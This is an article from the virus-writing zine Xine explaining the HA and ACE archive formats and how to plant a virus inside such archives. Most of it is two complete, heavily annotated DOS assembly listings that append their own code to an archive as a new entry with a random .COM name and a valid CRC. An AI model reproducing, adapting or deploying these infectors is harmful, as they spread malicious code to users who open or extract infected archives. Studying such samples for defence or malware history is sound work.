Xine - issue #3 - Phile 111
/-----------------------------\
| Xine - issue #3 - Phile 111 |
\-----------------------------/
Dropping over
Compression alternative format : HA & ACE
By UnknowN MnemomaniaK [iKx]
Introduction to HA
+------------------+
HA is a somewhat old compression format; it was meant to work with
compatibility from Linux to IBM DOS. Obviously it is not really used — I
have never seen any HA file — but the archive format exists, so I decided to
code it into my infector series in honor of the Zhengxi virus. Then let's see
how it works.
HA Format
+---------+
The HA structure is simple, like the RAR structure, but has one small
difficulty: an HA archive is split into two zones.
The small one is just: db 'HA' HA mark
dw 0 number of archives
and following this part there are many archives (entries), which all must
respect this header:
OFFSET LABEL TYPE VALUE DESCRIPTION
------ ----------- ---- ----------- ----------------------------------
00 VERCOMP DB 0 compression method & ver need
value: 0 = 'CPY' Stored 2 = 'HSC' compress using a [sic?]
1 = 'ASC' Default compress. 14 = 'DIR' Directory entry
15 = 'SPECIAL' Unknown (ver 0.99B)
01 COMPRESS HEX 00000000 compressed size
05 ORIG HEX 00000000 original size
09 CRC32 HEX 00000000 Crc32
0D DATEHOUR HEX 00000000 File-time Unix Standard
?? PATHNAME DS ? Pathname
?? SEPARATOR DB 0FF Separator equal to 0FFh
?? FILENAME DS ? Filename
?? SPEC DB 1 Machine spec
Value: 0 = MS DOS
1 = Linux
?? INFO DW 2 Information - Usually File Attributes
Infection
+---------+
The HA file infection is quite simple: you have to verify that the first 2
bytes are equal to HA, increment the word at offset 02h in the file by 1,
read 0Dh bytes, go to the end, write it, write no pathname + filename,
write the spec and close the file. Damn, let's build an algorithm:
1ø Read 4 bytes
2ø Verify the 2 first bytes , if <> HA then close file
3ø Inc the word at offset 02h
4ø Read 0Dh
5ø Rebuild the CRC32 & the name , (-> rebuild header)
6ø Go to the end
7ø Write the virus
8ø Close the file
The asm files are below the ACE section; if you need code, don't hesitate.
Introduction to ACE
+-------------------+
ACE is a fairly new format that has basically the same structure as RAR.
ACE is a serious archive format built by an independent developer; some
razor warez releases are known to use this file format. The ACE compression/
decompression software looks quite good and you very soon get the
impression that you are dealing with professional material.
ACE Format
+----------+
I'll only detail the format of a single header, because you just need to drop
one and then drop the virus to infect an archive.
OFFSET LABEL TYP VALUE DESCRIPTION
------ ----------- ---- ----------- ----------------------------------
00 HEADCRC DW 0000 CRC32x of the header(from 04 to 04+w,[02])
02 HEADSIZ DW 0000 Size of the header
04 HEADTYPE DB 0 Header type : 01 equal files
05 HEAD-FLAGS DW 0 Header : 8001h equal no problem flags :]
07 COMPRESS HEX 00000000 Compressed size
0B ORIG HEX 00000000 Original size
0F FILE TIME HEX 00000000 File time
13 FILE ATTRIB HEX 00000000 Considered as a DWORD,but a WORD is Used
17 CRC32x HEX 00000000 CRC32x of the file
18 INFOS HEX 00000000 Unknown ( Unused ? )
1B RESERVED DW 0000 Use a existing one
1F FILENAMESIZ DW 0000 Unknown ( Unused ? )
?? FILENAME DS NameFile
The ACE structure is kind of secret because it is not widely used and has not
been reimplemented by a lot of people, unlike RAR, ARJ or ZIP; it was written
by one individual only. What's the CRC32x? It's basically the CRC32 with a
second NOT applied to it, because the programmer forgot to put that in his CRC routine.
Infection
+---------+
So I consider that the best solution with ACE files is to reuse one
header from an existing packet in the archive; then you go to the end,
you rebuild the header, you calculate the header CRC, you drop the header and:
1ø Go to the end
2ø Rebuild the header
3ø Write the header
4ø Write the virus
5ø Close the file
But in the example, I analysed the complex ACE header structure to get
an existing header to use as a temporary one; let's see how I did that, if you
are interested.
- - - HA Infector ( test it with the appropriate file name ) - - - - - - - - -
; HA archive infector listing from the article above, annotated for analysis.
; Syntax: TASM/MASM-style (Intel operand order; "push si cx" multi-operand push).
; Target: 16-bit DOS .COM program (tiny model, org 100h); all file I/O goes
; through DOS int 21h with the handle kept in bx for the whole run.
.model tiny
.code
.286
org 100h
start: ; entry point: open the target, check the mark, append one entry, close
mov ax,3d02h ; DOS 3Dh open, al=2 = read/write access; dx -> ASCIIZ name
mov dx,offset name1 ; target file name is hard-coded ('yeye.ha')
int 21h
xchg ax,bx ; bx = file handle used by every int 21h call below
mov ah,3fh ; DOS 3Fh read: first 256 bytes into temporary1
mov cx,256 ; ('HA' mark, entry count and what follows, per the layout above)
mov dx,offset temporary1
int 21h
cmp word ptr [temporary1],'AH' ; bytes 'H','A' read as a little-endian word
jne HA_invalid ; not an HA archive: just close it
inc word ptr [temporary1+2] ; entry count at offset 02h:
; one more entry
mov al,2 ; al=2 -> seek relative to end of file
call go ; go to the end
call HA_build ; build the new entry header at temporary1+4; cx = its size
mov ah,40h ; DOS 40h write cx bytes from dx
mov dx,offset temporary1+4
int 21h ; write the new header
mov ah,40h
mov cx,fin-start ; body length = everything from start up to fin
mov dx,offset start
int 21h ; write the virus
xor ax,ax ; al=0 -> seek to absolute offset 0
call go
mov ah,40h
mov cx,4
mov dx,offset temporary1
int 21h ; write back the 'HA' mark and the
; updated entry count
HA_invalid:
mov ah,3Eh ; DOS 3Eh close handle bx
int 21h ; close the file
ret ; .COM program: return to DOS
HA_build: ; fill in the entry header at temporary1+4 (field offsets per the HA table)
; In:  temporary1+4.. holds bytes read from the archive; fields not written
;      below (0Dh DATEHOUR) keep whatever was read there
; Out: cx = number of header bytes to write (from temporary1+4)
; Clobbers: ax, dx, si, di, bp, flags
mov bp,offset temporary1+4
mov byte ptr [bp],20h ; 00h VERCOMP: low nibble 0 = 'CPY' stored per the table;
; high nibble presumably the version (original comment: "& version") - confirm
inc bp
mov word ptr [bp],fin-start ; 01h COMPRESS dword = body length, high word 0
mov word ptr [bp+2],0
add bp,4
mov cx,fin-start
mov word ptr [bp],cx ; 05h ORIG dword = same length (stored, not compressed)
mov word ptr [bp+2],0
add bp,4
mov si,offset start ; crc_calc: si = data, cx = length; returns dx:cx
push bp ; crc_calc/crc_table reuse bp as a counter
call crc_calc
pop bp
mov word ptr [bp],cx ; 09h CRC32 of the body: low word,
mov word ptr [bp+2],dx ; high word
add bp,8 ; bp -> 11h: skips 0Dh DATEHOUR (left as read from the file)
mov byte ptr [bp],0 ; 11h: empty path name (single 0 byte)
inc bp
call set_a_name ; betaname = random 'XXXX.COM',0; cx = 9
mov di,bp
add bp,cx ; bp -> first byte after the name
mov si,offset betaname
repz movsb ; copy the name incl. its 0 (repz acts as plain rep for movsb)
mov cx,bp
sub cx,offset temporary1+1 ; cx = (bp - (temporary1+4)) + 3: covers the 3 bytes below
mov word ptr [bp],0102h ; trailing bytes 02h,01h,20h: machine-specific info
mov byte ptr [bp+2],20h ; (presumably the table's SPEC/INFO; values differ from its samples)
ret ; return with header size in cx
set_a_name: ; build a pseudo-random 8.3 name in betaname from the DOS clock
; Out: betaname = 'XXXX.COM',0 with X in 'A'..'P'; cx = 9 (name length incl. 0)
; Clobbers: ax, dx, flags
mov ah,2Ch ; DOS 2Ch get time: ch = hour, cl = min, dh = sec, dl = 1/100
int 21h
and cx,0000111100001111b ; keep the low nibble (0..15) of each of the four bytes
and dx,0000111100001111b
add cx,4141h ; + 'A' per byte -> four letters in 'A'..'P'
add dx,4141h
mov word ptr [betaname],cx
mov word ptr [betaname+2],dx
mov word ptr [betaname+4],'C.' ; word stored little-endian: bytes '.','C'
mov word ptr [betaname+6],'MO' ; bytes 'O','M' -> "XXXX.COM"
mov word ptr [betaname+8],0 ; terminator (and one spare byte)
mov cx,9
ret
go: ; File seek: DOS 42h lseek on handle bx, offset cx:dx = 0
; In:  al = origin (0 = file start, 2 = end of file)
; Out: dx:ax = new file position; cx = 0
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
ret
crc_calc: ; right-shifting CRC-32 (table from polynomial 0EDB88320h) of cx bytes at si
; In:  si = data, cx = length (must be > 0: dec/jnz loop runs at least once)
; Out: dx:cx = CRC32 with the final NOT applied (dx = high word, cx = low word)
; Clobbers: ax, si, di, bp, flags; bx is preserved
push bx
push si cx ; multi-operand push: si, then cx
call crc_table ; (re)build the 256-entry table; di -> its base
pop cx si
mov bp,cx ; bp = bytes remaining
mov cx,0ffffh ; crc = 0FFFFFFFFh: low word in cx,
mov dx,0ffffh ; high word in dx
xor ax,ax ; ah = 0 so that bx = al after lodsb
Crc_loop:
lodsb
mov bx,ax
xor bl,cl ; index = (crc ^ byte) & 0FFh
mov cl,ch ; crc >>= 8, byte by byte;
mov ch,dl
mov dl,dh
mov dh,bh ; bh = 0 fills the top byte
shl bx,1
shl bx,1 ; index * 4: one dword per table entry
xor cx,word ptr [bx+di] ; crc ^= table[index] (low word,
xor dx,word ptr [bx+di+02] ; high word)
dec bp
jnz Crc_loop
not dx ; final complement
not cx
pop bx
ret
crc_table: ; build the 256 x dword CRC-32 lookup table in starttable, top entry first
; Out: di = table base (starttable+2): entry n at [di+n*4], low word first
; Clobbers: ax, cx, dx, bp, flags; DF is set during the loop and cleared on exit
mov di,offset starttable+1024 ; the buffer table
; remember : It begin by the end (entry 255 first; std makes stosw walk downward)
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On
TableHighloop: ; the major loop in the Crc table Calc
mov cx,8 ; set the minus loop to 8
mov dx,bp ; ax:dx = entry index (ax = high word, dx = low word)
xor ax,ax ; ax = zero
TableLowLoop:
shr ax,1 ; shift the 32-bit value ax:dx right one bit,
rcr dx,1 ; the bit leaving ax entering dx
jae anomality ; CF = bit shifted out of dx; if 0, no xor
xor dx,08320h ; xor with polynomial 0EDB88320h: low word,
xor ax,0EDB8h ; high word
anomality:
loop TableLowLoop ; make it 8 times
stosw ; store high word at di, di -= 2
xchg dx,ax
stosw ; then the low word just below it
dec bp ; decrement the counter
jnz TableHighLoop ; repeat it until bp = 0
mov word ptr [di],0 ; di is now starttable+4: entry 0 = 0
sub di,2
mov word ptr [di],0 ; starttable+2 = table base
cld ; clear direction flag
ret
name1: db 'yeye.ha',0 ; hard-coded target file name (ASCIIZ); part of the written body
fin: ; end of the bytes written as the body (fin-start); buffers below are not written
betaname: db 13 dup (?) ; generated 'XXXX.COM',0 name
starttable: db 1024 dup (?) ; 256 x dword CRC table, filled from the top by crc_table
db 2 dup (?) ; crc_table's first stosw lands at starttable+1024..1025
temporary1: db 256 dup (?) ; first 256 bytes of the archive; new entry header built at +4
end start
- - - HA Infector - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - ACE Infector ( test it with the appropriate file name )- - - - - - - - -
; ACE archive infector listing from the article above, annotated for analysis.
; Syntax: TASM/MASM-style (Intel operand order; "push si cx" multi-operand push).
; Target: 16-bit DOS .COM program (tiny model, org 100h); all file I/O goes
; through DOS int 21h with the handle kept in bx for the whole run.
.model tiny
.code
.286
org 100h
start: ; entry point: open the target, append a rebuilt file header + body, close
mov ax,3d02h ; DOS 3Dh open, al=2 = read/write access
mov dx,offset name1 ; target file name is hard-coded ('yeye.ace')
int 21h ; open filename
xchg ax,bx ; bx = file handle used by every int 21h call below
mov ah,3fh ; DOS 3Fh read
mov cx,4
mov dx,offset temporary1 ; read the 4 first bytes into temporary1:
int 21h ; HEADCRC and HEADSIZ words of the leading header
xor cx,cx
mov dx,word ptr [temporary1+2] ; go to offset 4 + w,[02h]: just past the leading header
add dx,4 ; (cx:dx = absolute offset)
xor ax,ax ; al = 0 -> seek from file start
call gozero
mov ah,3fh
mov cx,256
mov dx,offset temporary1
int 21h ; read 256 bytes: the first file header, used as a template
call ace_header ; rewrite it in place; bp = temporary1, [bp+2] = HEADSIZ
mov al,2 ; al = 2 -> seek to end of file
call go
mov ah,40h ; DOS 40h write
mov cx,word ptr [bp+2] ; HEADSIZ + 4: HEADCRC/HEADSIZ themselves are not counted
add cx,4
mov dx,offset temporary1
int 21h ; write the header
mov ah,40h
mov cx,fin-start ; body length = everything from start up to fin
mov dx,offset start
int 21h ; write the virus
ACE_invalid: ; unlike the HA version, no mark check jumps here; every path falls through
mov ah,3Eh ; DOS 3Eh close handle bx
int 21h ; close the file
ret ; .COM program: return to DOS
ACE_header: ; rewrite the file header at temporary1 (field offsets per the ACE table)
; In:  temporary1 = 256 bytes read at the first file header; fields not set
;      below (0Fh FILE TIME, 13h FILE ATTRIB, 1Bh..20h) keep what was read
; Out: bp = temporary1; [bp+2] = HEADSIZ; [bp] = header CRC (low word)
; Clobbers: ax, cx, dx, si, di, flags
mov bp,offset temporary1
mov byte ptr [bp+4],01 ; 04h HEADTYPE = 01 (file header per the table)
mov word ptr [bp+5],8001h ; 05h HEAD-FLAGS = 8001h
mov word ptr [bp+7],fin-start ; 07h COMPRESS dword = body length
mov word ptr [bp+7+2],0 ; size
mov word ptr [bp+0Bh],fin-start ; 0Bh ORIG dword = same length (stored as-is)
mov word ptr [bp+0Bh+2],0
push bp ; crc_calc/crc_table reuse bp as a counter
mov si,100h ; body starts at 100h (= offset start, org 100h)
mov cx,fin-start
call crc_calc
pop bp ; calc crc of the virus
not dx ; undo crc_calc's final NOT: CRC32x = un-complemented CRC
not cx
mov word ptr [bp+17h],cx ; 17h CRC32x: low word,
mov word ptr [bp+17h+2],dx ; high word
call set_a_name ; betaname = random 'XXXX.COM',0; cx = 9
dec cx ; cx = 8: name is stored without its terminating zero
mov word ptr [bp+1Dh+4],cx ; 21h FILENAMESIZ (the table above lists it at 1Fh)
mov word ptr [bp+02],cx ; 02h HEADSIZ = 1Fh + name length
add word ptr [bp+02],1Fh ; copy header size (1Fh+cx)
lea di,[bp+1Fh+4] ; 23h FILENAME
mov si,offset betaname ;
repz movsb ; copy name (repz acts as plain rep for movsb)
push bp
lea si,[bp+4] ; header CRC covers HEADSIZ bytes starting at 04h
mov cx,word ptr [bp+2]
call crc_calc ; render header CRC
pop bp
not cx ; un-complemented again; only the low word is kept
mov word ptr [bp],cx ; 00h HEADCRC
ret
set_a_name: ; build a pseudo-random 8.3 name in betaname from the DOS clock
; Out: betaname = 'XXXX.COM',0 with X in 'A'..'P'; cx = 9 (name length incl. 0)
; Clobbers: ax, dx, flags
mov ah,2Ch ; DOS 2Ch get time: ch = hour, cl = min, dh = sec, dl = 1/100
int 21h
and cx,0000111100001111b ; keep the low nibble (0..15) of each of the four bytes
and dx,0000111100001111b
add cx,4141h ; + 'A' per byte -> four letters in 'A'..'P'
add dx,4141h
mov word ptr [betaname],cx
mov word ptr [betaname+2],dx
mov word ptr [betaname+4],'C.' ; word stored little-endian: bytes '.','C'
mov word ptr [betaname+6],'MO' ; bytes 'O','M' -> "XXXX.COM"
mov word ptr [betaname+8],0 ; terminator (and one spare byte)
mov cx,9
ret
go: ; File seek to offset cx:dx = 0 from the origin in al (0 = start, 2 = end)
xor cx,cx
xor dx,dx
gozero: ; entry with a caller-supplied cx:dx offset (absolute when al = 0)
mov ah,42h ; DOS 42h lseek on handle bx; returns dx:ax = new position
int 21h
ret
crc_calc: ; right-shifting CRC-32 (table from polynomial 0EDB88320h) of cx bytes at si
; In:  si = data, cx = length (must be > 0: dec/jnz loop runs at least once)
; Out: dx:cx = CRC32 with the final NOT applied (dx = high word, cx = low word)
; Clobbers: ax, si, di, bp, flags; bx is preserved
push bx
push si cx ; multi-operand push: si, then cx
call crc_table ; (re)build the 256-entry table; di -> its base
pop cx si
mov bp,cx ; bp = bytes remaining
mov cx,0ffffh ; crc = 0FFFFFFFFh: low word in cx,
mov dx,0ffffh ; high word in dx
xor ax,ax ; ah = 0 so that bx = al after lodsb
Crc_loop:
lodsb
mov bx,ax
xor bl,cl ; index = (crc ^ byte) & 0FFh
mov cl,ch ; crc >>= 8, byte by byte;
mov ch,dl
mov dl,dh
mov dh,bh ; bh = 0 fills the top byte
shl bx,1
shl bx,1 ; index * 4: one dword per table entry
xor cx,word ptr [bx+di] ; crc ^= table[index] (low word,
xor dx,word ptr [bx+di+02] ; high word)
dec bp
jnz Crc_loop
not dx ; final complement
not cx
pop bx
ret
crc_table: ; build the 256 x dword CRC-32 lookup table in starttable, top entry first
; Out: di = table base (starttable): entry n at [di+n*4], low word first
; Clobbers: ax, cx, dx, bp, flags; DF is set during the loop and cleared on exit
mov di,offset starttable+1024-2 ; the buffer table
; remember : It begin by the end (entry 255 first; std makes stosw walk downward)
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On
TableHighloop: ; the major loop in the Crc table Calc
mov cx,8 ; set the minus loop to 8
mov dx,bp ; ax:dx = entry index (ax = high word, dx = low word)
xor ax,ax ; ax = zero
TableLowLoop:
shr ax,1 ; shift the 32-bit value ax:dx right one bit,
rcr dx,1 ; the bit leaving ax entering dx
jae anomality ; CF = bit shifted out of dx; if 0, no xor
xor dx,08320h ; xor with polynomial 0EDB88320h: low word,
xor ax,0EDB8h ; high word
anomality:
loop TableLowLoop ; make it 8 times
stosw ; store high word at di, di -= 2
xchg dx,ax
stosw ; then the low word just below it
dec bp ; decrement the counter
jnz TableHighLoop ; repeat it until bp = 0
mov word ptr [di],0 ; di is now starttable+2: entry 0 = 0
sub di,2
mov word ptr [di],0 ; starttable = table base
cld ; clear direction flag
ret
name1: db 'yeye.ace',0 ; hard-coded target file name (ASCIIZ); part of the written body
fin: ; end of the bytes written as the body (fin-start); buffers below are not written
betaname: db 13 dup (?) ; generated 'XXXX.COM',0 name
starttable: db 1024 dup (?) ; 256 x dword CRC table, filled from the top by crc_table
db 2 dup (?) ; spare (this variant starts at starttable+1024-2 and stays inside the table)
temporary1: db 256 dup (?) ; 4 bytes of the leading header, then the first file header
end start
- - - ACE Infector - - - - - - - - - - - - - - - - - - - - - - - - - - - - -